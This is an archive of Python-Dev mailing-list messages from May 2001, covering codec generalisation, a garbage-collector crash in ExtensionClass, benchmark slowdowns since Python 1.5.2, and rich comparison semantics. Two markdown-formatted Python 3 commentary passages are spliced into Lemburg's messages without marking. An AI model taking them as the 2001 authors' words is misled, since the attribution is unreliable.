From skip at pobox.com  Wed May 16 16:28:04 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 09:28:04 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B025F26.A625DE02@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com>
	<200105151635.LAA29530@cj20424-a.reston1.va.home.com>
	<m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
	<3B025F26.A625DE02@lemburg.com>
Message-ID: <15106.36468.62292.611515@beluga.mojam.com>

    mal> pickle and marshal would also be good to have wrapped as codecs.

Why?  They operate on much more than strings.

-- 
Skip Montanaro (skip at pobox.com)
(847)971-7098


From fredrik at effbot.org  Wed May 16 17:07:18 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 16 May 2001 17:07:18 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><m31yppo99f.fsf@atrus.jesus.cam.ac.uk><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com>
Message-ID: <002101c0de19$e7875a90$e46940d5@hagrid>

skip wrote:

>     mal> pickle and marshal would also be good to have wrapped as codecs.
> 
> Why?  They operate on much more than strings.

hypergeneralization, of course.

more candidates:

    "10".decode("int")
    "10.0".decode("float")
    "[1, 2, 3]".decode("list")
    "readme.txt".decode("file")
    "SyntaxError".decode("raise")
    (etc)

Cheers /F


From nas at python.ca  Wed May 16 18:19:42 2001
From: nas at python.ca (Neil Schemenauer)
Date: Wed, 16 May 2001 09:19:42 -0700
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 14, 2001 at 09:40:21PM +0200
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>
Message-ID: <20010516091942.A16455@glacier.fnational.com>

Martin v. Loewis wrote:
> In any case, I think you need to analyse this in a debugger.

#7  0x080bc17e in tupletraverse (o=0x8154914, visit=0x807d640 <visit_decref>, 
    arg=0x0) at ../Objects/tupleobject.c:366
366                             err = visit(x, arg);
(gdb) p *o
$11 = {ob_refcnt = 1, ob_type = 0x80eb5a0, ob_size = 1, ob_item = {0x402c5180}}
(gdb) p *o->ob_item[0]
$12 = {ob_refcnt = 2, ob_type = 0x0}

In other words, the GC is finding a tuple object that contains an
element with a funny looking address (data segment?) and an
ob_type of NULL.  The collector has started running from here:

#10 0x0807debc in collect_generations () at ../Modules/gcmodule.c:467
#11 0x0807dfc4 in _PyGC_Insert (op=0x819f57c) at ../Modules/gcmodule.c:507
#12 0x080af56a in PyDict_New () at ../Objects/dictobject.c:149
#13 0x0808d8b8 in getBaseDictionary (type=0x402bcc40)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1249
#14 0x0808eb45 in initializeBaseExtensionClass (self=0x402bcc40)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1495
#15 0x08095fb1 in export_subclassed_type (dict=0x81851fc, 
    name=0x402a9388 "GdkDragContext", typ=0x402bcc40, bases=0x816fc34)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:3451
#16 0x400194ac in pygobject_register_class (dict=0x81851fc, 
    class_name=0x402a9388 "GdkDragContext", 
    get_type=0x404d5c50 <gdk_drag_context_get_type>, ec=0x402bcc40, 
    bases=0x816fc34) at gobjectmodule.c:202
#17 0x402a55fd in pygtk_register_classes (d=0x81851fc) at gtk.c:31844
#18 0x40257004 in init_gtk () at gtkmodule.c:98

I don't have time to dig deeper into this right now but perhaps
this will help someone.

  Neil


From mal at lemburg.com  Wed May 16 18:24:57 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 18:24:57 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><m31yppo99f.fsf@atrus.jesus.cam.ac.uk><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid>
Message-ID: <3B02A9D9.113836D6@lemburg.com>

Fredrik Lundh wrote:
> 
> skip wrote:
> 
> >     mal> pickle and marshal would also be good to have wrapped as codecs.
> >
> > Why?  They operate on much more than strings.

Of course. 

Still their basic task is to take an object and
encode it in some way for dumps() and do the reverse for loads().
That's pretty much what codecs normally do ;-)

I wasn't referring to the use of pickle and marshal with string.encode()
and .decode(), even though you could then decode a pickle using
"pickledata".decode("pickle") and get back the object.

These two are very useful though when it comes to using codecs
for file wrappers:

f = codecs.open('mypicklfile', mode='wb', encoding='pickle')
f.write((123, 'abc', 456.789))
f.close()

f = codecs.open('mypicklfile', mode='rb', encoding='pickle')
t = f.read()
f.close()
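No `pickle` codec ships with Python, so the closest thing today is to register one yourself. This sketch works under that assumption. The codec name `pickledemo` is hypothetical. Only the object-to-bytes encode/decode half is shown, not the StreamReader/StreamWriter classes that `codecs.open()` would need for the file-wrapper use. This approach works because `codecs.encode()` and `codecs.decode()` hand arbitrary objects straight to the codec functions.

```python
import codecs
import pickle

def _pickle_encode(obj, errors="strict"):
    # Codec functions return (output, input length); a "length" is not
    # meaningful for an arbitrary object, so report 1 item consumed.
    return pickle.dumps(obj), 1

def _pickle_decode(data, errors="strict"):
    return pickle.loads(data), len(data)

def _search(name):
    if name == "pickledemo":  # hypothetical codec name
        return codecs.CodecInfo(_pickle_encode, _pickle_decode, name="pickledemo")
    return None

codecs.register(_search)

data = codecs.encode((123, 'abc', 456.789), "pickledemo")
print(type(data).__name__)                # bytes
print(codecs.decode(data, "pickledemo"))  # (123, 'abc', 456.789)
```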

> hypergeneralization, of course.
> 
> more candidates:
> 
>     "10".decode("int")
>     "10.0".decode("float")
>     "[1, 2, 3]".decode("list")
>     "readme.txt".decode("file")
>     "SyntaxError".decode("raise")
>     (etc)

You forgot the most important one ;-) ...

	"print 'My first Python program'".decode("python").run()

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From skip at pobox.com  Wed May 16 19:44:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 12:44:15 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B02A9D9.113836D6@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com>
	<200105151635.LAA29530@cj20424-a.reston1.va.home.com>
	<m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
	<3B025F26.A625DE02@lemburg.com>
	<15106.36468.62292.611515@beluga.mojam.com>
	<002101c0de19$e7875a90$e46940d5@hagrid>
	<3B02A9D9.113836D6@lemburg.com>
Message-ID: <15106.48239.813965.579600@beluga.mojam.com>

    mal> Still their basic task is to take an object and encode it in some way
    mal> for dumps() and do the reverse for loads().  That's pretty much
    mal> what codecs normally do ;-)

Yes, I see that.  The conceptual problem I have is that in all previous
examples I've seen here they have taken as input and returned as outputs
only strings or unicode objects.

    mal> These two are very useful though when it comes to using codecs
    mal> for file wrappers:

This use I missed.  Thanks for the explanation.

Skip


From mal at lemburg.com  Wed May 16 20:33:44 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 20:33:44 +0200
Subject: [Python-Dev] Performance compares
Message-ID: <3B02C808.E3354D3F@lemburg.com>

After reading a little of the comparison thread, I ran
some performance comparisons of my own, between
the current CVS version and Python 1.5.2.

Both versions were compiled on the same Linux machine, using the
same GCC compiler and optimization settings.

Here are the results from pybench 0.9 and pystone; some of the
figures show quite dramatic slow-downs. I'm not sure where they
result from, but they do concern me a bit, since the upgrade
path from 1.5.2 is probably the most common one to be expected
in user-land.

Since it is possible that these figures result from my specific 
machine setup, I'd like to know what other people see on their
machines.

Thanks.
--

Python 1.5.2:
Pystone(1.1) time for 10000 passes = 3.26
This machine benchmarks at 3067.48 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 4.43
This machine benchmarks at 2257.34 pystones/second
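As a quick check on these figures: the pystones/second rate is simply passes divided by elapsed time. By that measure, the CVS run takes about 36% longer than the 1.5.2 run on this box. The helper names below are illustrative only.

```python
def pystones_per_second(passes, seconds):
    return passes / seconds

def percent_slower(old_seconds, new_seconds):
    """How much longer the new run took, as a percentage of the old one."""
    return (new_seconds - old_seconds) / old_seconds * 100

print(round(pystones_per_second(10000, 3.26), 2))  # 3067.48 (Python 1.5.2)
print(round(pystones_per_second(10000, 4.43), 2))  # 2257.34 (Python CVS)
print(round(percent_slower(3.26, 4.43), 1))        # 35.9
```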

--

PYBENCH 0.9

Benchmark: /home/lemburg/tmp/pybench-cvs-O.pyb (rounds=10, warp=20)

Tests:                              per run    per oper.    diff *)
------------------------------------------------------------------------
          BuiltinFunctionCalls:    1152.60 ms    9.04 us   +64.70%
           BuiltinMethodLookup:     903.90 ms    1.72 us          
                 CompareFloats:     908.30 ms    2.02 us   +40.94%
         CompareFloatsIntegers:    1276.25 ms    2.84 us   +37.15%
               CompareIntegers:    1075.50 ms    1.19 us   +21.09%
                  CompareLongs:     989.40 ms    2.20 us   +47.12%
                CompareStrings:     844.80 ms    2.25 us   +33.99%
                CompareUnicode:    1018.65 ms    2.72 us       n/a
                 ConcatStrings:    1226.30 ms    8.18 us   +92.56%
                 ConcatUnicode:    1575.40 ms   10.50 us       n/a
               CreateInstances:    2094.05 ms   49.86 us  +101.86%
       CreateStringsWithConcat:    1515.75 ms    7.58 us  +111.67%
       CreateUnicodeWithConcat:    1833.85 ms    9.17 us       n/a
                  DictCreation:    2795.30 ms   18.64 us  +203.34%
             DictWithFloatKeys:    2285.70 ms    3.81 us   +18.73%
           DictWithIntegerKeys:    1444.65 ms    2.41 us   +58.53%
            DictWithStringKeys:    1262.60 ms    2.10 us   +52.83%
                      ForLoops:     989.95 ms   99.00 us   -10.01%
                    IfThenElse:    1232.45 ms    1.83 us   +23.25%
                   ListSlicing:     621.40 ms  177.54 us          
                NestedForLoops:     986.60 ms    2.82 us   +52.09%
          NormalClassAttribute:    1231.15 ms    2.05 us   +36.70%
       NormalInstanceAttribute:    1114.15 ms    1.86 us   +27.11%
           PythonFunctionCalls:    1251.25 ms    7.58 us   +46.09%
             PythonMethodCalls:    1034.35 ms   13.79 us   +42.19%
                     Recursion:     922.15 ms   73.77 us   +36.76%
                  SecondImport:    1055.45 ms   42.22 us  +100.47%
           SecondPackageImport:    1061.35 ms   42.45 us   +96.31%
         SecondSubmoduleImport:    1292.35 ms   51.69 us   +77.89%
       SimpleComplexArithmetic:    1748.00 ms    7.95 us  +120.97%
        SimpleDictManipulation:    1172.85 ms    3.91 us   +47.85%
         SimpleFloatArithmetic:     881.25 ms    1.60 us   +12.30%
      SimpleIntFloatArithmetic:     833.80 ms    1.26 us          
       SimpleIntegerArithmetic:     839.00 ms    1.27 us          
        SimpleListManipulation:    1252.60 ms    4.64 us   +69.37%
          SimpleLongArithmetic:    1360.65 ms    8.25 us  +100.43%
                    SmallLists:    2380.05 ms    9.33 us  +116.72%
                   SmallTuples:    1793.80 ms    7.47 us  +101.52%
         SpecialClassAttribute:    1257.35 ms    2.10 us   +37.91%
      SpecialInstanceAttribute:    1340.25 ms    2.23 us   +21.13%
                StringMappings:    1601.50 ms   12.71 us       n/a
              StringPredicates:    1059.70 ms    3.78 us       n/a
                 StringSlicing:    1235.90 ms    7.06 us   +98.32%
                     TryExcept:    1272.55 ms    0.85 us   +28.39%
                TryRaiseExcept:    1383.45 ms   92.23 us   +77.48%
                  TupleSlicing:    1163.05 ms   11.08 us   +75.29%
               UnicodeMappings:    1232.80 ms   68.49 us       n/a
             UnicodePredicates:    1294.95 ms    5.76 us       n/a
             UnicodeProperties:    1410.45 ms    7.05 us       n/a
                UnicodeSlicing:    1296.80 ms    7.41 us       n/a
------------------------------------------------------------------------
            Average round time:   73388.00 ms                  n/a

*) measured against: /home/lemburg/tmp/pybench-1.5.2-O.pyb (rounds=10, warp=20)

(Comparisons with a blank diff column are below the noise level of +/-10%.)



From tim.one at home.com  Wed May 16 21:07:49 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 15:07:49 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com>

[Tim]
> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

[Guido]
> Unclear what you're asking.  The language doesn't require any
> particular semantics for sequence comparisons, but the language of
> course includes the tuple and list sequence types, and it describes
> (albeit lacking some rigorous detail) what comparisons for those do.

The current

    Tuples and lists are compared lexicographically using comparison
    of corresponding items.

was quite clear in a cmp-only world.  In a richcmp world, "compared
lexicographically" is fuzzy enough that different implementations may do
different things in good faith, competent users may disagree about what it
means in specific cases, and programs may yield different results across
implementations (or random CVS patches <wink>).

> If there are specific lacks of detail, it probably helps to think
> about filling those in.

The *level* of additional detail intended is the cutoff between what's
guaranteed by the language and what's left up to the implementation.

The full truth before was relatively simple.  For a pair x, y of lists or
tuples,

def __cmp__(x, y):  # pretending this is a method on lists and tuples
    i = 0
    while i < len(x) and i < len(y):
        c = cmp(x[i], y[i])
        if c:
            return c
        i += 1
    return cmp(len(x), len(y))

was *almost* the entire tale, incl. that lengths were re-fetched on each
iteration.  What's left unexplained is the treatment of recursive lists, and
so the result of comparing them is a prime suspect for different behavior
across implementations and releases.

In a richcmp world, there are several additional ways in which the above
fails to capture the full truth, and each of those ways is another prime
suspect for surprises.

For example, I believe it's *intended* that:

1. Element comparisons continue to be strictly left-to-right, and
   that no element comparisons are to be performed after the leftmost
   element comparison that settles the issue (if any).

2. tuple/list comparison via == or != must use only == comparison on
   elements, and that implementations are allowed (but not required)
   to skip all element comparisons when == or != comparison is given
   lists/tuples of different sizes.

OTOH, I doubt (but don't know) it's intended that all implementations must
emulate other semantically significant details of the current implementation,
like:

1. <=, <, > and >= comparisons will do at most one element comparison
   that is not an == comparison.

2. Whenever a <, <=, > or >= element comparison is needed, the long-
   winded details of how that works, incl. but not limited to the
   specific "first try ==, then try <, then try >" strategy used to
   simulate a pre-richcmp cmp() when all else fails.
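The "first try ==, then try <, then try >" fallback in point 2 can be sketched in a few lines of Python 3. This re-expresses the strategy as described here; it is not CPython's code. The final tie-break by `id()` stands in for the old compare-by-address fallback, and that modeling choice is an assumption.

```python
def emulated_cmp(a, b):
    """Simulate a three-way cmp() using only rich comparisons."""
    if a == b:
        return 0
    if a < b:
        return -1
    if a > b:
        return 1
    # All three rich comparisons said "false": fall back to comparing
    # object identities, standing in for the old address comparison.
    return (id(a) > id(b)) - (id(a) < id(b))

print(emulated_cmp(1, 2), emulated_cmp(2, 2), emulated_cmp(3, 2))  # -1 0 1
```

With the class C from the example below, where == always answers true, this strategy yields 0 for cmp(a, b). That agrees with result #3.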

Going back to the original example:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> a, b = C(), C()
>>> a < b       #1
1
>>> [a] < [b]   #2
0
>>> cmp(a, b)   #3
0
>>> a > b       #4
1
>>> a == b      #5
1
>>> a != b      #6
1
>>>

Which of those results are *required* by the language, and which merely
*allowed*?

+ I believe #1, #4 and #5 are required.

+ I have no idea whether to call it "a bug" if the #2 and/or #3
  and/or #6 results differed, e.g., under Jython, or under
  CPython 2.3.  Indeed, I'm not even sure why #6 returns 1 under
  CPython today, and I've been staring at this a lot lately <wink>
  ... OK, #6 ends up getting resolved by comparing object
  addresses, which leaves "required or not?" fuzzy (i.e., *must*
  it be resolved that way?  or is it implementation-defined?).


From guido at digicool.com  Wed May 16 22:35:46 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 15:35:46 -0500
Subject: [Python-Dev] Rich comparison of lists and tuples
In-Reply-To: Your message of "Wed, 16 May 2001 15:07:49 -0400."
             <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com> 
Message-ID: <200105162035.PAA04299@cj20424-a.reston1.va.home.com>

[Subject fixed]

[Tim shows there's a lot left to the imagination when trying to glean
the meaning of list1==list2 using rich comparisons.]

I would like to break this down by defining the mapping between cmp()
and rich comparisons.

I propose:

- If cmp() is requested but not defined, and rich comparisons are
  defined, try ==, <, > in order; if all three yield false, act as if
  rich comparisons were not defined, and use the fallback comparison
  (i.e. by address).

- If a rich comparison is requested but not defined, use cmp() and use
  the obvious mapping.

- Continue to define the comparison of unequal sequences in terms of
  cmp().

- Testing == or != for sequences takes these shortcuts:

  1. if the lengths differ, the sequences differ

  2. compare the elements using == until a false return is found

Note that this defines 'x!=y' as 'not x==y' for sequences.  We could
easily go the extra mile and define != to use only != on the items;
but is this worth the extra complexity?
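Guido's two shortcuts fit in a short Python 3 sketch, together with Tim's point that an ordering comparison needs at most one non-== element comparison. Passing the operator as a string such as `"<"` is purely an assumption for illustration. Here `!=` is simply `not ==`, as the proposal implies.

```python
import operator

_OPS = {"<": operator.lt, "<=": operator.le, "==": operator.eq,
        "!=": operator.ne, ">": operator.gt, ">=": operator.ge}

def seq_richcompare(x, y, op):
    """Compare sequences x and y with the rich-comparison operator `op`."""
    if op in ("==", "!=") and len(x) != len(y):
        # Shortcut 1: sequences of different lengths are never equal.
        return op == "!="
    # Shortcut 2: scan left to right using only == on the elements,
    # stopping at the first pair that is not equal.
    n = min(len(x), len(y))
    i = 0
    while i < n and x[i] == y[i]:
        i += 1
    if i == n:
        # No differing element found: the lengths decide.
        return _OPS[op](len(x), len(y))
    if op == "==":
        return False
    if op == "!=":
        return True
    # Ordering: exactly one non-== element comparison settles it.
    return _OPS[op](x[i], y[i])

print(seq_richcompare([1, 2], [1, 3], "<"))        # True
print(seq_richcompare((1, 2), (1, 2, 0), "=="))    # False
print(seq_richcompare((1, 2), (1, 2, 0), "<"))     # True
```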



From skip at pobox.com  Wed May 16 22:37:43 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 15:37:43 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <20010516091942.A16455@glacier.fnational.com>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
	<200105122108.QAA09951@cj20424-a.reston1.va.home.com>
	<200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
	<15103.65486.61021.328424@beluga.mojam.com>
	<200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>
	<20010516091942.A16455@glacier.fnational.com>
Message-ID: <15106.58647.495143.164636@beluga.mojam.com>

    Neil> In other words the GC is finding a tuple object that contains an
    Neil> element with a funny looking address (data segment?) and an
    Neil> ob_type of NULL.

Neil,

I'm not sure if the funny looking address is a red herring or the key to the
crime.  I tried running with a breakpoint set in getBaseDictionary.  The
first couple times, the type parameter looked like

    $26 = (PyExtensionClass *) 0x80e7f60
    $27 = {ob_refcnt = 2, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x80d7138 "ExtensionClass", ...}

    $28 = (PyExtensionClass *) 0x80e8060
    $29 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x80d7209 "Base", ...}

The third time it looked like

    $30 = (PyExtensionClass *) 0x4019f120
    $31 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x4019dab2 "GObject", ...}

The difference between the first two calls and the third one is that the
first two objects are defined in ExtensionClass.o, which I currently
statically link into the interpreter.  The Gtk/GObject stuff is dynamically
loaded into the running executable, so it's not surprising that it winds up
at a wildly different address than the ExtensionClass stuff.  My current
best guess is that whatever object the tuple is referring to is declared
static in the dynamically loaded Gtk stuff and has no business getting
reclaimed by the collector.  Sounds like a missing Py_INCREF somewhere.

At the earliest point I've been able to check that object so far, its
ob_type field is NULL.

Skip


From cpr at emsoftware.com  Thu May 17 00:24:15 2001
From: cpr at emsoftware.com (Chris Ryland)
Date: Wed, 16 May 2001 18:24:15 -0400
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
Message-ID: <00f201c0de57$03042c20$6901a8c0@EM2>

This talk is most entertaining! Highly recommended to you good folk, if only
as a reinforcement of the good design principles embodied in Python (with
the exception of print >> ;-).

Jonathan Rees (an old Scheme/T hand) kept referring to Python whenever he
wanted to give an example of a modern dynamic language (disclaiming a lot of
knowledge about it). He mentioned it three or four times (usually
positively), so it must be at the top of his mind.
--
Cheers!
Chris Ryland
Em Software, Inc.
www.emsoftware.com


From greg at cosc.canterbury.ac.nz  Thu May 17 03:49:31 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 17 May 2001 13:49:31 +1200 (NZST)
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B02A9D9.113836D6@lemburg.com>
Message-ID: <200105170149.NAA18480@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> You forgot the most important one ;-) ...
>
>	"print 'My first Python program'".decode("python").run()

Surely that should be:

   "'My first Python program'.encode('stdout')".decode("python").decode("run")

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one at home.com  Thu May 17 03:56:56 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 21:56:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>

[Martin v. Loewis]
> I'll put a patch on SF soon which does what you want to do, i.e. tries
> tp_compare as the first thing if tp_richcompare is not there.

Thanks!  I'll check it out.

> Even with this patch, your code is faster if strings have a
> richcompare.

OK, from what I understand, that makes no sense.  Does it to you?  Assuming
you're still talking about my silly little

     "ab" < "cd"

test, then all the new code you put into your richcompare slot was a waste of
cycles for that specific case:  the new richcmp "objects the same type?" test
would fail, then the new "pointers equal?" test would fail, then the new "op
== Py_EQ?" test would fail, and then richcompare would give up and call
string_compare() anyway.  So I'm either missing something fundamental about
what you did, or it's a timing anomaly on your box that defies obvious
explanation ("but if I add three new tests that don't pay off, and make an
extra call, then it's faster!").

> Without richcompare, I get
>
> 0.720
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
>
> With it, I get
>
> 0.710
> 0.720
> 0.720
> 0.710
> 0.710
> 0.720
> 0.710
> 0.710
> 0.710
> 0.720

See above.

> Given that stock CVS python is in the 0.78 range, the difference is
> negligible, though.

Oh, I don't like giving up that easy on things that make no sense --
something else is happening here, although I've no idea what.


From tim.one at home.com  Thu May 17 04:17:37 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 22:17:37 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B02C808.E3354D3F@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com>

[MAL]
> Since it is possible that these figures result from my specific
> machine setup, I'd like to know what other people see on their
> machines.

Is this the same machine where you were able to get 15% difference a few
years ago by adding or removing an unreachable printf in ceval.c (or was that
Vladimir)?  If so, I bet it's degenerated to random 50% difference since then
<wink>.

My Win98SE box is *astonishingly* useless for timings.  Without fail, the
first time I run pystone after a reboot yields a result a solid 50% higher
than the second or subsequent times I run it (yes, it's major-league *slower*
the second time).  This is true across dozens of trials over several months,
and across all versions of Python.

And simple little loops routinely vary in reported runtime by a factor of 3.
I may have to dig my old Win95 box out of the packing crate <0.6 wink>.

None of that changes, of course, that the numbers you got are scary.


From jeremy at digicool.com  Thu May 17 00:37:47 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Wed, 16 May 2001 18:37:47 -0400 (EDT)
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B02C808.E3354D3F@lemburg.com>
References: <3B02C808.E3354D3F@lemburg.com>
Message-ID: <15107.315.19349.268345@slothrop.digicool.com>

As usual, the results you're reporting are quite different than what I
see on my machine.  I'd like to think that my machine is more normal
than yours, but I expect we're both oddballs <0.2 wink>.  I see
basically the same slowdowns that you see, but the amount of the
slowdown is quite a bit smaller.

I compared current CVS with 1.5.2, both compiled with GCC 2.95.3 and
the -O3 flag, and ran pybench on an 800MHz P3 with 256MB RAM running
Linux 2.2.17.

Python 1.5.2:
Pystone(1.1) time for 10000 passes = 0.85
This machine benchmarks at 11764.7 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 0.94
This machine benchmarks at 10638.3 pystones/second

PYBENCH 0.9

Benchmark: cvs (rounds=10, warp=100)

Tests:                              per run    per oper.  diff *
------------------------------------------------------------------------
          BuiltinFunctionCalls:      41.85 ms    1.64 us  +31.40%
                 CompareFloats:      39.60 ms    0.44 us  +13.96%
         CompareFloatsIntegers:
               CompareIntegers:
                  CompareLongs:      39.85 ms    0.44 us  +15.01%
                CompareStrings:
                CompareUnicode:
                 ConcatStrings:      48.65 ms    1.62 us  +46.76%
                 ConcatUnicode:
               CreateInstances:      75.75 ms    9.02 us  +55.54%
       CreateStringsWithConcat:      51.60 ms    1.29 us  +62.78%
       CreateUnicodeWithConcat:
                  DictCreation:      87.80 ms    2.93 us  +115.72%
             DictWithFloatKeys:
           DictWithIntegerKeys:
            DictWithStringKeys:
                      ForLoops:      63.85 ms   31.93 us  -13.60%
                    IfThenElse:
                   ListSlicing:
                NestedForLoops:      32.95 ms    0.66 us  +10.39%
          NormalClassAttribute:
       NormalInstanceAttribute:
           PythonFunctionCalls:      48.85 ms    1.48 us  +11.78%
             PythonMethodCalls:      38.95 ms    2.60 us  +12.09%
                     Recursion:
                  SecondImport:      37.80 ms    7.56 us  +65.79%
           SecondPackageImport:      38.95 ms    7.79 us  +50.68%
         SecondSubmoduleImport:      49.90 ms    9.98 us  +35.05%
       SimpleComplexArithmetic:      58.95 ms    1.34 us  +74.67%
        SimpleDictManipulation:
         SimpleFloatArithmetic:
      SimpleIntFloatArithmetic:
       SimpleIntegerArithmetic:
        SimpleListManipulation:      43.65 ms    0.81 us  +15.63%
          SimpleLongArithmetic:      42.70 ms    1.29 us  +53.32%
                    SmallLists:      79.15 ms    1.55 us  +56.89%
                   SmallTuples:      66.65 ms    1.39 us  +43.03%
         SpecialClassAttribute:
      SpecialInstanceAttribute:
                StringMappings:
              StringPredicates:
                 StringSlicing:      39.00 ms    1.11 us  +28.71%
                     TryExcept:
                TryRaiseExcept:      50.60 ms   16.87 us  +27.46%
                  TupleSlicing:      37.90 ms    1.80 us  +26.54%
               UnicodeMappings:
             UnicodePredicates:
             UnicodeProperties:
                UnicodeSlicing:
------------------------------------------------------------------------
            Average round time:    3177.00 ms                n/a

*) measured against: 1.5.2 (rounds=10, warp=100)

(As MAL did, I removed all the results where the difference is within
+/-10%.)

i-never-do-simple-complex-arithmetic-anyway-ly yr's,
Jeremy


From martin at loewis.home.cs.tu-berlin.de  Thu May 17 08:12:18 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 08:12:18 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>
Message-ID: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>

> OK, from what I understand, that makes no sense.  Does it to you?

After reviewing everything again, I think I now do: In the richcomp
case, I have

			res = (*f1)(v, w, op);
			if (res != Py_NotImplemented)
				return res;

f1 is string_richcompare, so I get 2 function calls inside do_richcmp:
one to string_richcompare, the other one to string_compare, as my
optimizations are not triggered in your example.

If I set tp_richcompare of strings to 0, I get past this code, and do

		c = (*f)(v, w);
		if (PyErr_Occurred())
			return NULL;
		return convert_3way_to_object(op, c);

Here, I get 3 function calls: f is string_compare, then
PyErr_Occurred, finally convert_3way_to_object, which converts
{-1,0,1} x Op -> {Py_True, Py_False}.

Indeed, when I inline convert_3way_to_object, I get the same speed in
both cases (with the remaining differences attributed to measurement
and gcc doing register usage differently in both functions).
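A minimal sketch of what the inlined conversion amounts to: map a 3-way result and a comparison opcode to a truth value. The enum is a stand-in that mirrors the order of CPython's Py_LT..Py_GE, and the function returns 1/0 rather than Py_True/Py_False. Both are simplifications for illustration, not the object.c code.

```c
/* Comparison opcodes; the order mirrors CPython's Py_LT..Py_GE,
   but this enum is a hypothetical stand-in for illustration. */
enum cmp_op { OP_LT, OP_LE, OP_EQ, OP_NE, OP_GT, OP_GE };

/* Map a 3-way result c (negative, zero, positive) plus an opcode to a
   truth value.  "static inline" lets the compiler fold it into the
   caller, which is the effect of hand-inlining convert_3way_to_object.
   Returns 1/0 here; the real function returns Py_True/Py_False. */
static inline int three_way_to_bool(enum cmp_op op, int c)
{
    switch (op) {
    case OP_LT: return c < 0;
    case OP_LE: return c <= 0;
    case OP_EQ: return c == 0;
    case OP_NE: return c != 0;
    case OP_GT: return c > 0;
    case OP_GE: return c >= 0;
    }
    return 0; /* not reached for valid opcodes */
}
```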

I'd still be in favour of giving strings a richcompare, since it
allows optimizing what I think is the single most frequent case:
Py_EQ on strings. With a control flow like

		if (a->ob_size != b->ob_size)
			goto False;

